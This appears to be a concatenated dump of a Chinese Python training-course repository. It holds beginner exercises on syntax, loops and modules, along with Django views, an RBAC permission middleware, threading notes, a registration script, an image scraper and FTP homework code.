变量,将程序中运算的中间结果暂时存到内存中,以便后续程序调用。 BIRTH_OF_CHINA = 1949 x = 1+2+3+4 y = x*5 + 3 # print((1+2+3+4)*5 + 3) ''' 1,变量是由数字字母下划线任意组合。 2,变量不能是数字开头。 3,变量不能是Python中的关键字。 ['and', 'as', 'assert', 'break', 'class', 'continue', 'def', 'del', 'elif', 'else', 'except', 'exec', 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is', 'lambda', 'not', 'or', 'pass', 'print', 'raise', 'return', 'try', 'while', 'with', 'yield'] 4,变量要具有可描述性。 name,age,fdasgfdas 5,变量不能使用中文。 6,变量不能过长。 AgeOfOldboy = 56 NumberOfStudents = 80 #下划线 age_of_oldboy = 56 number_of_students = 80 ''' # age1 = 6 # age2 = age1 # age3 = age2 # age2 = 13 # print(age1, age2, age3) # 6,13,6 #常量:一直不变的量。π,新中国成立 1949101 #约定俗成全部大写的变量为常量。放到文件最上面。 #注释:单行注释:# # 多行注释:''' ''' """ """ # 基础数据类型: ''' int:数字:计算。+ = * / % // ..... str:python中用引号引起来的就叫做字符串('' "")。 type(对象) 是什么数据类型 用处:储存简单的少量数据。 + * + 字符串的拼接。 * str* int bool: True,Flase ''' # print(666,type(666)) # print('666',type('666')) # msg = "My name is Alex , I'm 56 years old!" # msg = ''' # 今天我想写首小诗, # 歌颂我的同桌, # 你看他那乌黑的短发, # 好像一只炸毛鸡。 # ''' # print(msg) # a = '老男孩 ' # b = '是最好的培训机构' # c = a + b # print(c) # print('坚强'*8) # print(2 > 1) # input 出来的数据类型全部是字符串。 # name = input('请输入您的姓名:') # sex = input('请输入您的性别:') # print('我的名字是' + name,'我的性别是' + sex) msg =''' ------------ info of <NAME> ----------- Name : <NAME> Age : 56 job : Teacher Hobbie: laddy_boy ------------- end ----------------- ''' #格式化输出 % 占位符 s d #ps str -- > int str全部由数字组成 ‘1234’ #ps int -- > str str(int) #第一种表现形式: # name = input('请输入你的名字:') # age = input('请输入你的年龄:') # job = input('请输入你的工作:') # hobby = input('请输入你的爱好:') # msg1 = ''' ------------ info of %s ----------- # Name : %s # Age : %d # job : %s # Hobbie: %s # ------------- end ----------------- # ''' % (name,name,int(age),job,hobby) # print(msg1) #第二种方法: # dic = {'name':'老男孩','age':45,'job':'Teacher','hobby':'吹'} # msg1 = ''' ------------ info of %(name)s ----------- # Name : %(name)s # Age : %(age)d # job : %(job)s # Hobbie: %(hobby)s # ------------- end 
----------------- # ''' % dic # print(msg1) # msg2 = '我叫%s,今年%s,学习进度5%%' % ('太白',23) # print(msg2) #if 语句。 ''' if 条件: 结果 ''' #1 # if 2 > 1 : # print(666) #2 # if 2 < 1: # print(666) # else: # print(555) #3 多种条件选一个结果 # num = int(input('猜一下数字:')) # if num == 6: # print('请你吃饭') # elif num == 3: # print('请你喝酒') # elif num == 1: # print('请你大保健') #4 多种条件必选一个结果 # num = int(input('猜一下数字:')) # if num == 6: # print('请你吃饭') # elif num == 3: # print('请你喝酒') # elif num == 1: # print('请你大保健') # else: # print('没机会了.....') # if 2 > 1: # if 2 < 1: # print(333) # else: # if '条件': # pass # print(666) # score = int(input("输入分数:")) # if score > 100: # print("我擦,最高分才100...") # elif score >= 90: # print("A") # elif score >= 60: # print("C") # elif score >= 80: # print("B") # elif score >= 40: # print("D") # else: # print("太笨了...E") #while 循环 ''' while 条件: 结果 ''' # while True: # print('凉凉') # print('斗地主') # print('社会摇') # print('DJ大悲咒') # 如何终止循环: #1,改变条件。 #2,break # count = 1 # while count <= 100: # print(count) # count = count + 1 # count = 1 # flag = True # while flag: # print(count) # count = count + 1 # if count == 101: # flag = False # count = 1 # sum = 0 # while count < 101: # sum = sum +count # count += 1 # print(sum) #while 关键字:break,continue #break 结束循环。 #continue 跳出本次循环,继续下一次循环。 # while True: # print(333) # print(5455) # print(222) # break # print(888) # print(666) # while True: # print(333) # print(222) # continue # print(888) # print(666) #while else:如果while循环,被break打断,则不走else # count = 1 # while count < 5: # print(count) # count += 1 # else: # print('循环正常完毕') #逻辑运算符 #() > not > and > or #前后都是比较运算 2 > 1 and 3 < 4 or 4 > 5 and 2 < 1 # print(2 > 1 and 3 < 4 or 4 > 5 and 2 < 1) # True # print(1 > 1 and 3 < 4 or 4 > 5 and 2 > 1 and 9 > 8 or 7 < 6) # False #前后都是数字 '''x or y if x is True,return x,else return y int ---> bool 非0为True,0为Flase ''' # print(3 or 2) # print(2 or 6) # print(0 or 6) # print(3 and 5) # print(1 > 2 or 3 and 4 > 5) #dict dic = 
{'name':'alex','age':12,'python21':['张三','李四']} # print(dic['name']) #list: [] # li = [1,2,3,'alex'] # print(li[3]) #for 循环 有限循环。 li = [1,2,3,'alex'] s = 'fdsagfdagasd' # for i in s: # print(i) # for i in s: # if i == 'a':pass # print(i) # else: # print(666) ''' 1、使用while循环输入 1 2 3 4 5 6 8 9 10 2、求1-100的所有数的和 3、输出 1-100 内的所有奇数 4、输出 1-100 内的所有偶数 5、求1-2+3-4+5 ... 99的所有数的和 奇数和偶数 ''' # 6、用户登陆(三次机会重试) #input username password #while i #可以支持多用户登录 li = [{'username':'alex','password':'SB'}, {'username':'wusir','password':'sb'}, {'username':'taibai','password':'男神'}, ] #客户输入了三次机会,都没成功,给它一个选择,让它在试试 # Y 再给他三次机会...不输入了,print('臭不要脸.....') # dic = {True:'alex',False:'SB'} # dic = {(1,2,3):'alex',(2,3):'SB'} # dic[(1,2,3)]<file_sep>/day2/购物车练习.py ##商品列表是个列表类型的 shangpin = [["iphone",6500], ["mac",10000], ["watch",200] ] shopping_list = [] salry = int(input("请时输入你的工资:")) print("商品列表;") while True: for i in enumerate(shangpin): print(i) buy_id = input("请时输入你的id:") if not buy_id: continue if buy_id.isdigit(): buy_id=int(buy_id) buy_num = input("请输入你的购买个数:") if not buy_num:continue if buy_num.isdigit(): buy_num = int(buy_num) if shangpin[buy_id][1] * buy_num < salry: print("你已经购买成功") a = 1 while a <= buy_num: shopping_list.append({"name": shangpin[buy_id][0],"price":shangpin[buy_id][1],"num":buy_num}) a += 1 #print(shopping_list) salry = salry - (shangpin[buy_id][1] * buy_num) print("你的余额是%s元" % (salry)) chinose = input("如果继续购买请按y,否则按q:") if chinose == "y" or chinose == "Y": continue else: salry = 0 for j in range(len(shopping_list)): print("订单%s: %s %s元" % (j + 1, shopping_list[j]["name"], shopping_list[j]["price"])) salry = salry + shopping_list[j]["price"] print("一共消费%s元" % (salry)) break else: print("你的余额已经不够了,请选择购买其他商品") <file_sep>/day16/mysite/app01/views.py # Create your views here. 
from django.shortcuts import HttpResponse, render, redirect
from app01 import models


# View functions that handle incoming user requests.
def index(request):
    """Render the site index page.

    :param request: all data related to the user's request, wrapped by
        Django into a single ``request`` object
    :return: the rendered ``index.html`` response
    """
    print(request.method)     # HTTP method of the request
    print(request.path_info)  # requested URL path
    # Open the file and read the content ourselves:
    # with open('index.html', "rb") as f:
    #     data = f.read()
    # return HttpResponse("o98k")
    # Let Django open the html file, read its content and return it to the user.
    return render(request, "index.html")


# Login page
def login(request):
    """Show the login form (GET) or validate the posted credentials (POST)."""
    # Behave differently depending on the request method.
    print(request.method)
    if request.method == "POST":
        # The user submitted a username and password.
        # Pull the POSTed data out of the request.
        print(request.POST)  # a big dict-like object
        # Validate the username and password.
        username = request.POST.get("username", "")
        pwd = request.POST.get("password", "")
        if username == "alex" and pwd == "<PASSWORD>":
            # Login succeeded.
            # return HttpResponse("登陆成功")
            # Redirect the user's browser to the index page.
            return redirect("/index/")
        else:
            # Login failed.
            return HttpResponse("登录失败")
    # Return the login page for the user to fill in.
    return render(request, 'login.html')


# Publisher list
def publisher_list(request):
    """List all publishers."""
    # The business logic lives here!!!
    # 1. Query all publisher rows.
    data = models.Publisher.objects.all()
    print(data)
    # 2. Render them into the page returned to the user.
    return render(request, "publisher_list.html", {"data": data})


# Add a publisher
def add_publisher(request):
    """Create a publisher from the posted form (POST) or show the form (GET)."""
    # A POST request means the user filled in the publisher name and sent it.
    if request.method == "POST":
        # 1. Grab the submitted data.
        publisher_name = request.POST.get("publisher_name")
        # 2. Store it in the database.
        models.Publisher.objects.create(name=publisher_name)
        # 3. Redirect the user back to the publisher list page.
        return redirect("/publisher_list/")
    return render(request, "add_publisher.html")


# Delete a publisher
def delete_publisher(request):
    """Delete the publisher whose id is given in the query string."""
    print(request.GET)
    # 1. Get the row the user wants deleted.
    delete_id = request.GET.get("id")
    # 2. Delete it from the database.
    models.Publisher.objects.get(id=delete_id).delete()
    # 3.
    # Redirect back to the publisher list page after a successful delete.
    return redirect("/publisher_list/")


# Edit a publisher
def edit_publisher(request):
    """Show the edit form (GET) or save the edited publisher name (POST)."""
    # A POST request means the user finished editing and sent the new data.
    if request.method == "POST":
        # Grab the submitted data.
        edit_id = request.POST.get("id")
        new_publisher_name = request.POST.get("publisher_name")
        # Update the `name` field of the given publisher.
        # First locate the publisher by edit_id.
        obj = models.Publisher.objects.get(id=edit_id)
        # Change its name.
        obj.name = new_publisher_name
        # Flush the change to the database.
        obj.save()
        # Edit succeeded; jump back to the publisher list page.
        return redirect("/publisher_list/")
    # 1. Get the id of the publisher the user wants to edit.
    edit_id = request.GET.get("id")
    # 2. Fetch that row from the database.
    obj = models.Publisher.objects.get(id=edit_id)
    # 3. Show its current name on the page.
    return render(request, "edit_publisher.html", {"publisher": obj})
<file_sep>/day24/auto - 12 - 权限粒度控制到按钮/rbac/middlewares/rbac.py
import re

from django.utils.deprecation import MiddlewareMixin
from django.conf import settings
from django.shortcuts import HttpResponse


class RBACMiddleware(MiddlewareMixin):
    """
    Middleware that checks the current user's permissions on every request.
    """

    def process_request(self, request):
        """Permission check.

        1. Take the URL of the current request.
        2. Fetch all permissions of the current user from the session.
        3. Match the URL against those permissions.

        :param request: the incoming request
        :return: None to continue processing, or an HttpResponse to abort
        """
        current_url = request.path_info
        # 1. Whitelist handling: whitelisted URL patterns skip the check.
        for valid in settings.VALID_LIST:
            if re.match(valid,current_url):
                return None

        # 2. Fetch the permission info from the session.
        permission_dict = request.session.get(settings.RBAC_PERMISSION_SESSION_KEY)
        if not permission_dict:
            return HttpResponse('当前用户无权限信息,请重新登录!')
        """
        permission_dict = {
            'user_list': {'url': '/app01/user/', 'menu_id': 1, 'parent_name': None},
            'user_add': {'url': '/app01/user/add/', 'menu_id': None, 'parent_name': 'user_list'},
            'user_edit': {'url': '/app01/user/edit/(\\d+)', 'menu_id': None, 'parent_name': 'user_list'},
            'order': {'url': '/app01/order/', 'menu_id': 2, 'parent_name': None}
        }
        """
        # 3.
权限匹配 match = False for k,v in permission_dict.items(): reg = "^%s$" % v['url'] if re.match(reg,current_url): # 用于以后生成菜单时候,设置默认选中的菜单。 if v['menu_id']: request.default_selected_menu_name = k else: request.default_selected_menu_name = v['parent_name'] match = True break if not match: return HttpResponse('无权访问') <file_sep>/day9/线程/1 创建线程.py #线程默认都是加了gil锁,在同一时刻,只能有一个线程访问cpu import os import time from threading import Thread n=100 def func(i): global n time.sleep(1) n-=1 print(os.getpid(),'thread%s'%i) l=[] for i in range(100): p=Thread(target=func,args=(i,)) p.start() l.append(p) for t in l: t.join() print(n) # 什么是进程 :是计算机资源分配的最小单位 # 什么是线程 # 线程和进程的关系 : # 每一个进程中都至少有一个线程 # 每个进程里至少有一个主线程负责执行代码 # 在主线程中可以再开启一个新的线程 # 在同一个进程中就有两个线程同时在工作了 # 线程才是CPU调度的最小单位 # 多个线程之间的数据时共享的 #注意:使用多线程处理高计算的场景,python并不占优势,如果是高io类型的,就比较适合 #如:较多的网络请求,数据库请求,文件请求 <file_sep>/day20/CMS/static/js/register.js // 设置错误提示 $("#submit-btn").click(function () { // 因为注册功能有头像文件 数据,所以要用FormData对象提交数据 var fd = new FormData(); fd.append("username", $("#id_username").val()); fd.append("password", $("#id_password").val()); fd.append("re_password", $("#id_re_password").val()); fd.append("phone", $("#id_phone").val()); fd.append("email", $("#id_email").val()); fd.append("csrfmiddlewaretoken", $("[name='csrfmiddlewaretoken']").val()); // avatar头像 fd.append("avatar", $("#id_avatar")[0].files[0]); $.ajax({ url: "/register/", type: "post", data: fd, contentType: false, processData: false, success: function (res) { if (res.code === 1) { $.each(res.error, function (k, v) { console.log(k, v[0]); { // #先找到input标签,下面的那个标签,然后设置错误信息,再找到显示错误标签的父标签,设置has - error } $("#id_" + k).next().text(v[0]).parent().addClass("has-error"); }) } else { location.href = res.url } } }) }); // 给input标签绑定获取焦点就删除错误提示的动作 $(".register-form input").focus(function () { $(this).next().text("").parent().removeClass("has-error"); }); //头像预览功能 //值发生变化了 $("#id_avatar").change(function () { // 取到用户选中的头像文件 var fileObj = this.files[0]; //路径 // 
新建一个FileReader对象,从本地磁盘加载文件数据 var fr = new FileReader(); fr.readAsDataURL(fileObj); // 读取文件是需要时间的 fr.onload = function () { // 找到头像预览的img标签,把它的src属性设置成我读取的用户选中的图片 $("#avatar-img").attr("src", fr.result) //结果 } });<file_sep>/day25/正则爬取.py # import requests # import re # import os # # url = 'https://www.qiushibaike.com/pic/page/%s/' # # # headers = { # 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', # } # # # 指定起始也结束页码 # page_start = int(input('enter start page:')) # page_end = int(input('enter end page:')) # # # 创建文件夹 # if not os.path.exists('images'): # os.mkdir('images') # # 循环解析且下载指定页码中的图片数据 # for page in range(page_start, page_end + 1): # print('正在下载第%d页的图片' % page) # new_url = format(url % page) # print(new_url) # response = requests.get(url=new_url, headers=headers) # # # 解析图片链接正则匹配 # e = '<div class="thumb">.*?<img src="(.*?)".*?>.*?</div>' # pa = re.compile(e, re.S) # image_urls = pa.findall(response.text) # # #循环下载该页码下所有的图片数据 # # for url in image_urls: # image_url='https:'+ url # image_name=image_url.split('/')[-1] # image_path='images/'+image_name # image_data=requests.get(url=image_url,headers=headers).content # with open(image_path,'wb') as f: # f.write(image_data) #!/usr/bin/env python # -*- coding:utf-8 -*- import requests import re import os if __name__ == "__main__": url = 'https://www.qiushibaike.com/pic/%s/' headers={ 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', } #指定起始也结束页码 page_start = int(input('enter start page:')) page_end = int(input('enter end page:')) #创建文件夹 if not os.path.exists('images'): os.mkdir('images') #循环解析且下载指定页码中的图片数据 for page in range(page_start,page_end+1): print('正在下载第%d页图片'%page) new_url = format(url % page) print(new_url) response = requests.get(url=new_url,headers=headers) #解析response中的图片链接 e = '<div class="thumb">.*?<img 
src="(.*?)".*?>.*?</div>' pa = re.compile(e,re.S) image_urls = pa.findall(response.text) #循环下载该页码下所有的图片数据 for image_url in image_urls: image_url = 'https:' + image_url image_name = image_url.split('/')[-1] image_path = 'images/'+image_name image_data = requests.get(url=image_url,headers=headers).content with open(image_path,'wb') as fp: fp.write(image_data)<file_sep>/day4/优秀的作业/优秀的作业/马珺浩/day04作业_马珺浩/员工信息数据库/readme.txt ‘员工信息数据库.py’为主程序; ‘员工信息.txt’为员工信息; ‘staff_pwd’为用户密码本; ‘员工信息数据库流程图_马珺浩.png’为程序流程图。 下面是程序玩法及说明: 1.程序开始运行,该程序模拟的环境是RHEL7的管理员状态,需手动终止程序; 2.想进入数据库有两种方式: (1)直接输入‘mysql’,进入数据库,此时用户登录状态为空,只支持查询功能; (2)已‘mysql -u [username] -p [password]’的形式登录数据库,[username]、 [password]信息取自密码表‘staff_pwd’,输入错误报错,输入正确进去数据库,并且支持 数据库的查询、修改、添加、删除功能。 3.数据库的查询方式有两种: (1)列名查询:使用列名查询的方式,语法格式为‘select [列名1 或 列名1,列 名2... 或 * ] where [条件(支持‘>’‘<’‘=’,例如:‘age>12’、‘job=IT’)]’, 语法输入正确后以表的形式打印查询结果;(例如输入‘select id,name,phone where age>12’) (2)模糊查询:使用模糊查询的方式,语法格式为‘select [列名1 或 列名1,列 名2... 或 * ] where [列名] like [条件]]’,语法输入正确后以表的形式打印查询结果; (例如输入‘select id,name,job where phone like 133’) 4.数据库的添加功能写了一个认证的装饰器,如果在进入数据库时,是直接输入‘mysql’进来 的话,那么输入‘insert ...’,由于当前的用户登录状态为空,所以回车后会请你输入用户 名、密码,用户名、密码信息来自‘staff_pwd’密码本; 5.修改、添加、删除功能暂不能实现; 6.语法校正:数据库语言要在命令结尾输入‘;’,在我的程序里,输不输入都可以,回车就够了; 7.退出数据库,输入‘exit’,退回到RHEL7的管理员状态,并清除数据库的用户登录状态; 8.主程序中的函数定义、循环等代码,以及在编写过程中方便记录变量名用来做什么,都已加注释 及描述。<file_sep>/day8/模块/模块.py #import my_module as mm money=2000 #mm.func() #print(mm.money) #总结 # 导入一个模块 就相当于执行了这个文件 # 一个模块如果执行多次import是什么效果?只执行一次 # from my_module import func as f ,money as m #as就是重命名 # f() # print(m) # 模块总结 # 能不能导入模块 : sys.path # 导入模块的顺序 : 内置 扩展 自定义 # 导入模块 : 相当于执行了这个模块,文件中的名字会被存储在一块独立的内存空间中 # import # 在全局创建了一个模块名,指向属于这个模块的命名空间 # 空间里存储了所有文件中的名字 # 起别名 import ... as .. 
# 不推荐一行导入多个模块 # from import # import后面的名字会出现在全局 ,相当于对独立命名空间中的一个引用 # from import 也支持 as语句 也支持 导入多个名字 # from import * 相当于导入所有名字,*和被导入模块__all__是互相影响的<file_sep>/day8/ftp作业/ceshi.py import socket import json import configparser class Server: def __init__(self,ip_port): self.ip_port=ip_port def init_socket(self): global conn global ret sk = socket.socket() sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sk.bind((self.ip_port)) sk.listen() while True: print('等待连接') conn, addr = sk.accept() print('连接成功') while True: ret=json.loads(conn.recv(1024).decode('utf-8')) if type(ret) ==list: ip_port.register_login() elif ret==ls: ip_port.cmd() elif ret==get: ip_port.get() conn.close() sk.close() def register_login(self): config = configparser.ConfigParser() config.read('userinfo') user = (config.sections()) username=ret[0] pwd=ret[1] for i in user: if i == username and config[username]['md5'] == pwd: conn.send('登录成功'.encode('utf-8')) else: conn.send('你输入的用户名或密码错误'.encode('utf-8')) def cmd(self): print('ls') def put(self): print('put') def get(self): print('get') server=Server(('127.0.0.1',8090)) server.init_socket() #ip_port.register_login() #if __name__=='__main__': <file_sep>/day8/glance/cmd/manage.py def main(): print('from manage.py')<file_sep>/day5/模块.py ##collections模块 import collections #orderedDict 有序字典 # d = collections.OrderedDict() # # d['苹果'] = 10 # d['手机']=5000 # print(d) # for i in d: # print(i,d[i]) ##defaultdict 默认字典 ##小于66的放到k2,大于66的放到k1,形成一个新字典 from collections import defaultdict #l= [11, 22, 33, 44, 55, 66, 77, 88, 99, 90] ##常规写法 # new_dict={} # for value in l: # if value>66: # if new_dict.has_key('k1'): # new_dict['k1'].append(value) # else: # new_dict['k1']=value # else: # if new_dict.has_key('k2'): # new_dict['k2'].append(value) # else: # new_dict['k2'] = value # print(new_dict) ##默认字典写法 # new_dict = defaultdict(list) # for value in l: # if value > 66: # new_dict['k1'].append(value) # else: # new_dict['k2'].append(value) # print(new_dict) 
##namedtuple 生成可以使用名字来访问元素内容的tuple # from collections import namedtuple # Point = namedtuple('point',['x','y']) # p=Point(1,2) # print(p.x) # print(p.y) #deque双端队列 # from collections import deque # q=deque() # print(q) # q.append(1) # q.append(2) # print(q) # q.pop() # print(q) # q.appendleft('a') # q.appendleft('b') # print(q) # q.popleft() # print(q) ##time时间模块 import time # print(time.time()) ##时间戳时间 # print(time.strftime('%Y-%m-%d %H:%M:%S'))##字符串时间 # print(time.localtime()) ##结构化时间 ##时间转换 # print(time.localtime(1600000000)) ##时间戳转换成结构化时间 # struct_time=time.gmtime(1600000000) # print(time.strftime('%Y-%m-%d %H:%M:%S',struct_time))##结构化转换成字符串 ##字符串时间转换成时间戳时间 # s = '2015-12-3 8:30:20' # ret = time.strptime(s,'%Y-%m-%d %H:%M:%S') ##字符串转换成结构化 # print(ret) # print(time.mktime(ret)) ##结构化转换成时间戳 ''' ##计算两个时间段相隔了多长时间 #第一种写法 true_time=time.mktime(time.strptime('2008-05-12 08:30:00','%Y-%m-%d %H:%M:%S')) time_now=time.mktime(time.strptime('2018-05-07 11:00:00','%Y-%m-%d %H:%M:%S')) dif_time=time_now-true_time ##得到是一个时间戳 ret=time.gmtime(dif_time) ##把时间戳转换成结构化时间 print(ret) print('过去了%d年%d月%d天%d小时%d分钟%d秒' %(ret.tm_year-1970,ret.tm_mon-1,ret.tm_mday-1,ret.tm_hour,ret.tm_min,ret.tm_sec)) ''' ''' ##第二种写法 计算现在的时间跟1991年相差了多少时间 ago_time='1991-1-3' now_time=time.localtime() current_time=time.strptime(ago_time,'%Y-%m-%d') # print(now_time) # print(current_time) #cha_time=now_time-current_time print('过去了%d年%d月%d天' %(now_time.tm_year-current_time.tm_year,now_time.tm_mon-current_time.tm_mon,now_time.tm_mday-current_time.tm_mday)) ''' ##random 模块可以用于随机生成可用于验证码 import random # print(random.random()) ##是介于0和1之间的小数 # print(random.uniform(1,4)) ##介于1和4之间的的小数 # print(random.randint(1,5)) ##介于1和5之间的随机整数 ##随机生成一个四位的验证码 # s='' # for i in range(4): # s+=str(random.randint(0,9)) # print(s) ''' ##随机生成一个字母和数字组合的验证码 #(65,90)A-Z (97,122)a-z import random yanzheng='' for i in range(6): num1=random.randint(65,90) alpha1=chr(num1) num2=random.randint(97,122) alpha2=chr(num2) 
num3=str(random.randint(0,9)) #print(alpha1,alpha2,num3) s=random.choice([alpha1,alpha2,num3]) yanzheng+=s print(yanzheng) ''' #sys模块 python解释器 import sys #sys.exit() ##解释器退出,程序结束 # print(sys.path) #一个模块是否能够被导入 全看在不在sys.path列表所包含的路径下 # print(sys.modules) ## 放了所有在解释器运行的过程中导入的模块名 # print(sys.argv) ##注意,不能在pyhon里面直接执行,应该是D:\python21\day5\模块.py这种执行方式 ''' if sys.argv[1]=='hu' and sys.argv[2]=='123': print('登录成功') else: sys.exit() ''' ##os模块 import os # print(os.getcwdb())#获取当前目录 # os.chdir('C:\python21') #更改目录 # print(os.getcwdb()) # # ret = 'path1%spath2'%os.pathsep #输出用于分割文件路径的字符串 win下为;,Linux下为: # print(ret) print(os.name) #输出字符串指示当前使用平台。win->'nt'; Linux->'posix' #print(os.makedirs(r'c:/a/b')) ##创建多级目录 #os.removedirs(r'c:/a/b')# 若目录为空,则删除,并递归到上一级目录,如若也为空,则删除,依此类推 #print(os.listdir(r'c:\python21')) ##列出当前目录所有的文件和目录,以列表形式打印 # print(os.environ) ##获取系统环境变量 #os.system("dir") ##运行shell命令,直接显示,不用打印 # ret = os.popen("dir").read() ##运行shell命令,获取执行结果,需要打印 # print(ret) ##os.path # print(os.path.abspath(r'模块.py')) ##获取绝对路径 # #结果C:\python21\day5\模块.py # print(os.path.dirname('C:\python21\day5\模块.py')) ##获取上一级目录 # #结果C:\python21\day5 # print(os.path.split('C:\python21\day5\模块.py'))#将path分割成目录和文件名二元组返回 # #结果('C:\\python21\\day5', '模块.py') # print(os.path.basename('C:\python21\day5\模块.py')) ##只获取到文件名 #结果:模块.py # print(os.path.exists('C:\python21\day5\模块.py'))##判断路径是否存在,存在返回true # print(os.path.isabs(r'模块.py')) ##判断是否是绝对路径,是返回true # print(os.path.isfile('C:\python21\day5')) ##判断是否是文件,是返回true # print(os.path.isdir('C:\python21\day5')) ##判断是否是目录,是返回true # print(os.path.join('c:','python21'))##将多个路径组合后返回 # print(os.path.getatime('C:\python21\day5')) #获取文件目录最后访问时间 # print(os.path.getmtime('C:\python21\day5')) #获取文件目录最后修改时间 # print(os.path.getsize(r'C:\python21\day5\模块.py'))#获取文件大小 # print(os.path.getsize(r'C:\python21\day4'))#获取目录大小 ##获取目录下文件大小 ##计算不在同一目录下的文件大小 # dirs = "C:\python21\day4" # sum=0 # C:\python21\day4\ceshi.py # for path in ret: # if os.path.isfile(os.path.join(dirs, 
path)): # sum+=os.path.getsize(os.path.join(dirs,path)) # print(sum) ##同一目录下文件的大小 # ret = os.listdir(r'C:\python21\day5') # for path in ret: # if os.path.isfile(path): # sum+=os.path.getsize(path) # print(sum) ##计算文件夹下面的文件及其文件夹下的文件夹 ''' sum=0 def func(dirs): # 'C:\python21\day5') ##默认是字符串 global sum for file in os.listdir(dirs):##列出dirs目录下面所有的文件及其目录 if os.path.isdir(os.path.join(dirs,file)): ## # dirs 是 C:\python21\day5\a # file是 目录下面的文件 C:\python21\day5\a\b.txt func(os.path.join(dirs,file)) else: print("%s:%s" % (file,os.path.getsize(os.path.join(dirs,file)))) sum+=os.path.getsize(os.path.join(dirs,file)) return sum print(func(r'C:\python21\day5')) ''' # ###打印列表里面的每个元素,直到没有列表为止 # lst=[1,[2,[3,[4]]],"a"] # def func(lst): # for i in lst: # if type(i) == list: # func(i) # else: # print(i) # func(lst) sum = 0 def func(dirs): global sum for file in os.listdir(dirs): if os.path.isdir(os.path.join(dirs,file)): func(os.path.join(dirs,file)) else: sum+=os.path.getsize(os.path.join(dirs,file)) print("%s:%s" % (file,os.path.getsize(os.path.join(dirs,file)))) return sum print(func(r'C:\python21\day4')) <file_sep>/day8/ftp作业/get_client.py import socket import struct import json import os import hashlib DOWNLOAD_DIR=r'D:\python21\day8\ftp作业\download' class FtpClient: def __init__(self,host,port): self.host=host self.port=port self.client=socket.socket() self.client.connect((self.host,self.port)) def login(self): userinfo = [] while True: username = input('请输入你的用户名:') userinfo.append(username) pwd = input('请输入你的密码:') # userinfo.append(pwd) hash_user = hashlib.md5(username.encode('utf-8')) hash_pwd = hash_user.update(pwd.encode('utf-8')) md5_pwd = hash_user.hexdigest() userinfo.append(md5_pwd) userinfo_byttes = bytes(json.dumps(userinfo), encoding='utf-8') # 把列表转换成bytes while True: self.client.send(userinfo_byttes) ret = self.client.recv(1024).decode('utf-8') print(ret) if ret=='true': client.command() else: client.login() # self.client.close() def command(self): while True: 
data=input('>>: ').strip() #get a.txt if not data:continue params=data.split() #parmas=['get','a.txt'] cmd=params[0] #cmd='get' if hasattr(self,cmd): func=getattr(self,cmd) func(params) #func(['get','a.txt']) def get(self,params): params_json=json.dumps(params) self.client.send(params_json.encode('utf-8')) # 1、先接收报头的长度 headers_size = struct.unpack('i', self.client.recv(4))[0] # 2、再收报头 headers_bytes = self.client.recv(headers_size) headers_json = headers_bytes.decode('utf-8') headers_dic = json.loads(headers_json) print('========>', headers_dic) filename = headers_dic['filename'] filesize = headers_dic['filesize'] filepath = os.path.join(DOWNLOAD_DIR, filename) # 3、再收真实的数据 with open(filepath, 'wb') as f: recv_size = 0 while recv_size < filesize: line = self.client.recv(1024) recv_size += len(line) f.write(line) print('===>下载成功') if __name__ == '__main__': client=FtpClient('127.0.0.1',8080) client.login()<file_sep>/day2/郑朝晖.py goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998}] flag = True buyProduct = dict() buyNumCode = [] money = int(input("请输入你的存额:")) while flag: print('%s %s %s' % ('商品编号', '商品名称', '商品价格')) for numCode in range(len(goods)): product = goods[numCode] print('%(id)5d %(name)7s %(price)8d' % {'id': numCode, 'name': product.get("name"), 'price': product.get("price")}) numCode = int(input("请选择你要购买商品编号:")) count = int(input("请输入你要购买的数量:")) buyTotal = goods[numCode].get("price") * count if buyTotal > money: choiceYN = input("你的余额不足,是否选择购买其它商品,Y/N:") if choiceYN == "Y" or choiceYN == "Y".lower(): continue else: flag = False else: money -= buyTotal if numCode in buyNumCode: count = buyProduct.get(numCode).get("count") + count buyProduct.get(numCode).update(count=count) else: buyNumCode.append(numCode) buyProduct.update({numCode: {"name": goods[numCode].get("name"), "price": goods[numCode].get("price"), "count": count}}) choiceYN = input("你还需要购买其它商品吗,Y/N: ") if choiceYN == "Y" or 
choiceYN == "Y".lower(): continue else: break if len(buyProduct) == 0: print("你没有购买任何商品,你的金额为:{}".format(money)) else: consumeTotal = 0 print("你购买的商品为:") print("{:^} {:^} {:^} {:^}".format("商品名称", "商品价格", "商品数量", "商品价格")) for k, v in buyProduct.items(): print('{:>4s} {:>6d} {:>8d} {:>8d}'.format(v.get("name"), v.get("price"), v.get("count"), v.get("price") * v.get("count"))) consumeTotal = consumeTotal + v.get("price") * v.get("count") print("你总共花费金额为:{},还剩金额为:{}".format(consumeTotal, money))<file_sep>/day21/CMS/fault_reporting/views.py from django.shortcuts import render, redirect, HttpResponse from django import views from django.contrib import auth # auth认证模块 import random from fault_reporting import forms # 用forms注册 from fault_reporting import models from django.db import transaction # 事务操作模块 from django.http import JsonResponse # json格式 from django.contrib.auth.decorators import login_required # auth装饰器 from bs4 import BeautifulSoup # 用来清洗数据 from django.db.models import F # F查询,需要对数据库里面的字段计算 import os from fault_reporting import mypage # 分页功能 from django.db.models import Count # 计算数据库里面的数字 # Create your views here. 
